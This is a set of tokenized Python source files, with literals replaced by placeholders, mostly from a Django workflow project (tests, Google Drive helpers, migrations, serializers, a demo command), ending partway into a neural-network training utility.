'<STR_LIT:input>' ] . endswith ( '<STR_LIT:/>' ) : <EOL> options [ '<STR_LIT:input>' ] += '<STR_LIT:/>' <EOL> if not os . path . isfile ( options [ '<STR_LIT:input>' ] + '<STR_LIT>' ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> if not options [ '<STR_LIT>' ] : <EOL> options [ '<STR_LIT>' ] = options [ '<STR_LIT:input>' ] + os . path . basename ( os . path . dirname ( options [ '<STR_LIT:input>' ] ) ) <EOL> else : <EOL> options [ '<STR_LIT>' ] = os . path . abspath ( os . path . expanduser ( options [ '<STR_LIT>' ] ) ) <EOL> if not os . path . isdir ( os . path . dirname ( options [ '<STR_LIT>' ] ) ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> if not os . access ( os . path . dirname ( options [ '<STR_LIT>' ] ) , os . W_OK ) : <EOL> logger . error ( "<STR_LIT>" + options [ '<STR_LIT>' ] ) <EOL> sys . exit ( <NUM_LIT:5> ) <EOL> logger . info ( "<STR_LIT>" + options [ '<STR_LIT:input>' ] + "<STR_LIT>" + options [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> with ChDir ( options [ '<STR_LIT:input>' ] ) as c : <EOL> files = [ f for f in os . listdir ( '<STR_LIT:.>' ) if os . path . isfile ( f ) and f . endswith ( '<STR_LIT>' ) ] <EOL> try : <EOL> subprocess . call ( [ '<STR_LIT>' , options [ '<STR_LIT>' ] + '<STR_LIT>' ] + files ) <EOL> except : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:10> ) <EOL> with open ( options [ '<STR_LIT>' ] , '<STR_LIT:w>' ) as outfile : <EOL> echo = subprocess . Popen ( [ '<STR_LIT>' , r'<STR_LIT>' ] , stdout = subprocess . PIPE ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT:->' , options [ '<STR_LIT>' ] + '<STR_LIT>' ] , stdin = echo . stdout , stdout = outfile ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> os . chmod ( options [ '<STR_LIT>' ] , <NUM_LIT:0> <NUM_LIT> ) <EOL> os . remove ( options [ '<STR_LIT>' ] + '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" + options [ '<STR_LIT>' ] + "<STR_LIT:'>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from unittest . mock import patch <EOL> from orchestra . tests . helpers import OrchestraAuthenticatedTestCase <EOL> from orchestra . models import CommunicationPreference <EOL> from orchestra . tests . helpers . fixtures import WorkerFactory <EOL> from orchestra . tests . helpers . fixtures import setup_models <EOL> class AccountSettingsTest ( OrchestraAuthenticatedTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> self . request_client , self . user = self . authenticate_user ( ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . worker = WorkerFactory ( user = self . user ) <EOL> def _get_account_settings_mock_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def test_get_form ( self ) : <EOL> response = self . request_client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( response , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_change_all_fields ( self , mock_get_slack_user_id ) : <EOL> mock_get_slack_user_id . return_value = '<STR_LIT>' <EOL> data = self . _get_account_settings_mock_data ( ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertTrue ( response . context [ '<STR_LIT:success>' ] ) <EOL> self . user . refresh_from_db ( ) <EOL> self . assertEqual ( self . user . first_name , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . user . last_name , data [ '<STR_LIT>' ] ) <EOL> self . worker . refresh_from_db ( ) <EOL> self . assertEqual ( self . worker . slack_username , data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . worker . phone , data [ '<STR_LIT>' ] + data [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( self . worker . slack_user_id , '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_missing_fields ( self , mock_get_slack_user_id ) : <EOL> mock_get_slack_user_id . return_value = '<STR_LIT>' <EOL> required_fields = self . _get_account_settings_mock_data ( ) . keys ( ) <EOL> for field in required_fields : <EOL> data = self . _get_account_settings_mock_data ( ) <EOL> data . pop ( field ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertFalse ( response . context [ '<STR_LIT:success>' ] ) <EOL> class CommunicationPreferenceSettingsTest ( OrchestraAuthenticatedTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ) . setUp ( ) <EOL> setup_models ( self ) <EOL> self . url = reverse ( '<STR_LIT>' ) <EOL> self . request_client , self . user = self . authenticate_user ( ) <EOL> worker = self . workers [ <NUM_LIT:0> ] <EOL> worker . user = self . user <EOL> worker . save ( ) <EOL> self . comm_pref = CommunicationPreference . objects . filter ( <EOL> worker = worker ) . first ( ) <EOL> def test_get_form ( self ) : <EOL> response = self . request_client . get ( self . url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTemplateUsed ( <EOL> response , '<STR_LIT>' ) <EOL> def _get_mock_data ( self ) : <EOL> return { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : self . comm_pref . id , <EOL> } <EOL> def test_disable_email ( self ) : <EOL> data = self . _get_mock_data ( ) <EOL> response = self . request_client . post ( self . url , data ) <EOL> self . assertTrue ( response . context [ '<STR_LIT:success>' ] ) <EOL> self . comm_pref . refresh_from_db ( ) <EOL> self . assertFalse ( self . comm_pref . methods . email . is_set ) </s>
<s> from collections import Counter <EOL> from datetime import date <EOL> import logging <EOL> import os <EOL> import re <EOL> import tempfile <EOL> from django . conf import settings <EOL> import requests <EOL> from orchestra . google_apps . errors import FailedRequest <EOL> from orchestra . google_apps . errors import InvalidUrlError <EOL> from orchestra . google_apps . errors import GoogleDriveError <EOL> from orchestra . google_apps . permissions import read_with_link_permission <EOL> from orchestra . google_apps . permissions import write_with_link_permission <EOL> from orchestra . google_apps . service import Service <EOL> from orchestra . utils . common_regex import image_file_regex <EOL> from orchestra . utils . settings import run_if <EOL> logger = logging . getLogger ( __name__ ) <EOL> _image_mimetype_regex = re . compile ( '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> TEAM_MESSAGES_TEMPLATE_ID = '<STR_LIT>' <EOL> def _get_image_mimetype ( response , title ) : <EOL> """<STR_LIT>""" <EOL> if ( response . headers . get ( '<STR_LIT>' ) and <EOL> _image_mimetype_regex . search ( response . headers <EOL> . get ( '<STR_LIT>' ) ) ) : <EOL> return response . headers . get ( '<STR_LIT>' ) <EOL> extension = title . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . format ( extension ) <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def add_image ( service , folder_id , url ) : <EOL> """<STR_LIT>""" <EOL> response = requests . get ( url , stream = True ) <EOL> if response . status_code != <NUM_LIT:200> : <EOL> raise FailedRequest ( '<STR_LIT>' <EOL> '<STR_LIT>' , ( url ) ) <EOL> temp = tempfile . NamedTemporaryFile ( mode = '<STR_LIT:wb>' , delete = False ) <EOL> for chunk in response . iter_content ( <NUM_LIT> ) : <EOL> temp . write ( chunk ) <EOL> title_regex = image_file_regex . search ( response . url ) <EOL> if title_regex is None : <EOL> raise InvalidUrlError ( '<STR_LIT>' ) <EOL> title = title_regex . group ( ) <EOL> mimetype = _get_image_mimetype ( response , title ) <EOL> temp . close ( ) <EOL> google_image = service . insert_file ( title , <EOL> '<STR_LIT:image>' , <EOL> folder_id , <EOL> mimetype , <EOL> temp . name ) <EOL> os . unlink ( temp . name ) <EOL> return google_image <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_media_folder_with_images ( parent_id , image_links , folder_name ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> folder = create_folder_with_permissions ( parent_id , <EOL> folder_name , <EOL> [ read_with_link_permission ] ) <EOL> folder_id = folder [ '<STR_LIT:id>' ] <EOL> counter = Counter ( ) <EOL> for image_link in image_links : <EOL> try : <EOL> image = add_image ( service , folder_id , image_link ) <EOL> counter [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> logger . info ( '<STR_LIT>' , image ) <EOL> except ( InvalidUrlError , FailedRequest ) : <EOL> counter [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> logger . exception ( '<STR_LIT>' , <EOL> image_link ) <EOL> return { '<STR_LIT>' : folder , <EOL> '<STR_LIT>' : counter } <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_folder_with_permissions ( parent_id , folder_name , permissions = None ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> folder = service . insert_folder ( folder_name , parent_id ) <EOL> if folder is None : <EOL> raise GoogleDriveError ( '<STR_LIT>' ) <EOL> permissions = permissions or [ ] <EOL> for permission in permissions : <EOL> service . add_permission ( folder . get ( '<STR_LIT:id>' ) , <EOL> permission ) <EOL> return folder <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_project_google_folder ( project ) : <EOL> """<STR_LIT>""" <EOL> today = date . today ( ) . strftime ( '<STR_LIT>' ) <EOL> parent_id = ( project . project_data . get ( '<STR_LIT>' ) or <EOL> settings . GOOGLE_PROJECT_ROOT_ID ) <EOL> folder = create_folder_with_permissions ( <EOL> parent_id , <EOL> '<STR_LIT:U+0020>' . join ( ( today , project . short_description ) ) , <EOL> [ write_with_link_permission ] ) <EOL> folder_id = folder . get ( '<STR_LIT:id>' ) <EOL> project . project_data [ '<STR_LIT>' ] = folder_id <EOL> project . team_messages_url = create_document_from_template ( <EOL> TEAM_MESSAGES_TEMPLATE_ID , <EOL> '<STR_LIT>' , <EOL> [ folder_id ] , <EOL> [ write_with_link_permission ] ) [ '<STR_LIT>' ] <EOL> project . save ( ) <EOL> return folder <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def create_document_from_template ( template_id , name , <EOL> parent_ids = None , permissions = None ) : <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> upload_info = service . copy_file ( template_id , name , <EOL> parent_ids = parent_ids ) <EOL> if upload_info is None : <EOL> raise GoogleDriveError ( '<STR_LIT>' . format ( name ) ) <EOL> logger . info ( upload_info ) <EOL> document_id = upload_info . get ( '<STR_LIT:id>' ) <EOL> permissions = permissions or [ ] <EOL> for permission in permissions : <EOL> service . add_permission ( document_id , permission ) <EOL> upload_info [ '<STR_LIT:status>' ] = '<STR_LIT:success>' <EOL> upload_info [ '<STR_LIT:id>' ] = document_id <EOL> return upload_info <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def download_file ( file_metadata ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> mimetype = file_metadata [ '<STR_LIT>' ] <EOL> title = file_metadata [ '<STR_LIT:title>' ] <EOL> return service . get_file_content ( file_metadata [ '<STR_LIT:id>' ] ) , title , mimetype <EOL> @ run_if ( '<STR_LIT>' ) <EOL> def upload_file ( parent_id , file_path , title , description , mimetype ) : <EOL> """<STR_LIT>""" <EOL> service = Service ( settings . GOOGLE_P12_PATH , <EOL> settings . GOOGLE_SERVICE_EMAIL ) <EOL> file_metadata = service . insert_file ( <EOL> title , <EOL> description , <EOL> parent_id , <EOL> mimetype , <EOL> file_path <EOL> ) <EOL> return file_metadata </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:status>' , <EOL> field = models . IntegerField ( default = <NUM_LIT:0> , choices = [ ( - <NUM_LIT:1> , '<STR_LIT>' ) , ( <NUM_LIT:0> , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , max_length = <NUM_LIT:200> ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> import django . utils . timezone <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateTimeField ( default = django . utils . timezone . now ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False ) , <EOL> ) , <EOL> ] </s>
<s> from orchestra . models import Iteration <EOL> from orchestra . models import Project <EOL> from orchestra . models import Task <EOL> from orchestra . models import TaskAssignment <EOL> from orchestra . models import TaskTimer <EOL> from orchestra . models import TimeEntry <EOL> from orchestra . models import WorkerCertification <EOL> from rest_framework import serializers <EOL> class ProjectSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Project <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> workflow_slug = serializers . SerializerMethodField ( ) <EOL> def get_workflow_slug ( self , obj ) : <EOL> return obj . workflow_version . workflow . slug <EOL> workflow_version_slug = serializers . SlugRelatedField ( <EOL> source = '<STR_LIT>' , slug_field = '<STR_LIT>' , read_only = True ) <EOL> task_class = serializers . ChoiceField ( <EOL> choices = WorkerCertification . TASK_CLASS_CHOICES ) <EOL> project_data = serializers . SerializerMethodField ( ) <EOL> def get_project_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . project_data <EOL> class TaskSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Task <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> step_slug = serializers . SlugRelatedField ( source = '<STR_LIT>' , <EOL> slug_field = '<STR_LIT>' , <EOL> read_only = True ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> latest_data = serializers . SerializerMethodField ( ) <EOL> assignments = serializers . SerializerMethodField ( ) <EOL> def get_status ( self , obj ) : <EOL> return dict ( Task . STATUS_CHOICES ) . get ( obj . status , None ) <EOL> def get_latest_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> active_assignment = ( obj . assignments <EOL> . filter ( status = TaskAssignment . Status . PROCESSING ) ) <EOL> if active_assignment . exists ( ) : <EOL> assignment = active_assignment [ <NUM_LIT:0> ] <EOL> else : <EOL> assignment = ( obj . assignments . all ( ) <EOL> . order_by ( '<STR_LIT>' ) . first ( ) ) <EOL> if not assignment : <EOL> return None <EOL> latest_data = assignment . in_progress_task_data <EOL> return latest_data <EOL> def get_assignments ( self , obj ) : <EOL> assignments = TaskAssignmentSerializer ( obj . assignments . all ( ) <EOL> . order_by ( '<STR_LIT>' ) , <EOL> many = True ) <EOL> return assignments . data <EOL> class TaskAssignmentSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TaskAssignment <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> worker = serializers . SerializerMethodField ( ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> in_progress_task_data = serializers . SerializerMethodField ( ) <EOL> iterations = serializers . SerializerMethodField ( ) <EOL> def get_worker ( self , obj ) : <EOL> if not obj . worker : <EOL> return { <EOL> '<STR_LIT:id>' : None , <EOL> '<STR_LIT:username>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> return { <EOL> '<STR_LIT:id>' : obj . worker . id , <EOL> '<STR_LIT:username>' : obj . worker . user . username , <EOL> '<STR_LIT>' : obj . worker . user . first_name , <EOL> '<STR_LIT>' : obj . worker . user . last_name , <EOL> } <EOL> def get_status ( self , obj ) : <EOL> return dict ( TaskAssignment . STATUS_CHOICES ) . get ( obj . status , None ) <EOL> def get_iterations ( self , obj ) : <EOL> iterations = IterationSerializer ( <EOL> obj . iterations . order_by ( '<STR_LIT>' ) , many = True ) <EOL> return iterations . data <EOL> def get_in_progress_task_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . in_progress_task_data <EOL> class TimeEntrySerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TimeEntry <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:date>' , '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' ) <EOL> read_only_fields = ( '<STR_LIT:id>' , ) <EOL> class TaskTimerSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = TaskTimer <EOL> class IterationSerializer ( serializers . ModelSerializer ) : <EOL> class Meta : <EOL> model = Iteration <EOL> fields = ( <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> status = serializers . SerializerMethodField ( ) <EOL> submitted_data = serializers . SerializerMethodField ( ) <EOL> def get_status ( self , obj ) : <EOL> return dict ( Iteration . STATUS_CHOICES ) . get ( obj . status , None ) <EOL> def get_submitted_data ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . submitted_data </s>
<s> def machine_function ( project_data , prerequisites ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:version>' : '<STR_LIT>' } </s>
<s> from pprint import pprint <EOL> import subprocess <EOL> from time import sleep <EOL> from django . core . management . base import BaseCommand <EOL> from orchestra . orchestra_api import create_orchestra_project <EOL> from orchestra . orchestra_api import get_project_information <EOL> class Command ( BaseCommand ) : <EOL> help = '<STR_LIT>' <EOL> def add_arguments ( self , parser ) : <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> def handle ( self , * args , ** options ) : <EOL> self . fast_mode = not options [ '<STR_LIT>' ] <EOL> continue_demo = self . intro ( ) <EOL> if not continue_demo : <EOL> return <EOL> self . describe_workflow ( ) <EOL> project_id = self . create_project ( ) <EOL> self . project_info_1 ( project_id ) <EOL> self . rating_task ( ) <EOL> self . project_info_2 ( project_id ) <EOL> self . conclusion ( ) <EOL> def pause ( self , n_seconds ) : <EOL> if not self . fast_mode : <EOL> sleep ( n_seconds ) <EOL> def intro ( self ) : <EOL> subprocess . call ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> ack = input ( '<STR_LIT>' ) . lower ( ) <EOL> while ack not in [ '<STR_LIT:y>' , '<STR_LIT:n>' ] : <EOL> ack = input ( '<STR_LIT>' ) . lower ( ) <EOL> if ack == '<STR_LIT:n>' : <EOL> print ( '<STR_LIT>' ) <EOL> return False <EOL> print ( '<STR_LIT>' ) <EOL> return True <EOL> def describe_workflow ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> def create_project ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '''<STR_LIT>''' ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> input ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> project_id = create_orchestra_project ( <EOL> None , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:10> , <EOL> { <EOL> '<STR_LIT:url>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:train>' , <EOL> ) <EOL> print ( '<STR_LIT>' . format ( project_id ) ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> return project_id <EOL> def project_info_1 ( self , project_id ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> input ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> project_info = get_project_information ( project_id ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> pprint ( project_info ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> def rating_task ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> input ( '<STR_LIT>' ) <EOL> def get_rating_info ( self , msg , project_id ) : <EOL> input ( msg ) <EOL> project_info = get_project_information ( project_id ) <EOL> complete = project_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] == '<STR_LIT>' <EOL> rating = ( project_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) <EOL> if complete else None ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> pprint ( project_info ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> return complete , rating <EOL> def project_info_2 ( self , project_id ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> complete , rating = self . get_rating_info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , project_id ) <EOL> while not complete : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> complete , rating = self . get_rating_info ( <EOL> '<STR_LIT>' , project_id ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> if not rating : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( rating ) ) <EOL> self . pause ( <NUM_LIT:4> ) <EOL> def conclusion ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . pause ( <NUM_LIT:2> ) <EOL> print ( '<STR_LIT>' ) </s>
<s> import glob <EOL> import time <EOL> import os <EOL> import numpy as np <EOL> import hickle as hkl <EOL> from proc_load import crop_and_mirror <EOL> def proc_configs ( config ) : <EOL> if not os . path . exists ( config [ '<STR_LIT>' ] ) : <EOL> os . makedirs ( config [ '<STR_LIT>' ] ) <EOL> print "<STR_LIT>" + config [ '<STR_LIT>' ] <EOL> return config <EOL> def unpack_configs ( config , ext_data = '<STR_LIT>' , ext_label = '<STR_LIT>' ) : <EOL> flag_para_load = config [ '<STR_LIT>' ] <EOL> train_folder = config [ '<STR_LIT>' ] <EOL> val_folder = config [ '<STR_LIT>' ] <EOL> label_folder = config [ '<STR_LIT>' ] <EOL> train_filenames = sorted ( glob . glob ( train_folder + '<STR_LIT>' + ext_data ) ) <EOL> val_filenames = sorted ( glob . glob ( val_folder + '<STR_LIT>' + ext_data ) ) <EOL> train_labels = np . load ( label_folder + '<STR_LIT>' + ext_label ) <EOL> val_labels = np . load ( label_folder + '<STR_LIT>' + ext_label ) <EOL> img_mean = np . load ( config [ '<STR_LIT>' ] ) <EOL> img_mean = img_mean [ : , : , : , np . newaxis ] . astype ( '<STR_LIT>' ) <EOL> return ( flag_para_load , <EOL> train_filenames , val_filenames , train_labels , val_labels , img_mean ) <EOL> def adjust_learning_rate ( config , epoch , step_idx , val_record , learning_rate ) : <EOL> if config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if epoch == config [ '<STR_LIT>' ] [ step_idx ] : <EOL> learning_rate . set_value ( <EOL> np . float32 ( learning_rate . get_value ( ) / <NUM_LIT:10> ) ) <EOL> step_idx += <NUM_LIT:1> <EOL> if step_idx >= len ( config [ '<STR_LIT>' ] ) : <EOL> step_idx = <NUM_LIT:0> <EOL> print '<STR_LIT>' , learning_rate . get_value ( ) <EOL> if config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if ( epoch > <NUM_LIT:5> ) and ( val_record [ - <NUM_LIT:3> ] - val_record [ - <NUM_LIT:1> ] < <EOL> config [ '<STR_LIT>' ] ) : <EOL> learning_rate . set_value ( <EOL> np . float32 ( learning_rate . get_value ( ) / <NUM_LIT:10> ) ) <EOL> print '<STR_LIT>' , learning_rate . get_value ( ) <EOL> return step_idx <EOL> def get_val_error_loss ( rand_arr , shared_x , shared_y , <EOL> val_filenames , val_labels , <EOL> flag_para_load , img_mean , <EOL> batch_size , validate_model , <EOL> send_queue = None , recv_queue = None , <EOL> flag_top_5 = False ) : <EOL> validation_losses = [ ] <EOL> validation_errors = [ ] <EOL> if flag_top_5 : <EOL> validation_errors_top_5 = [ ] <EOL> n_val_batches = len ( val_filenames ) <EOL> if flag_para_load : <EOL> send_queue 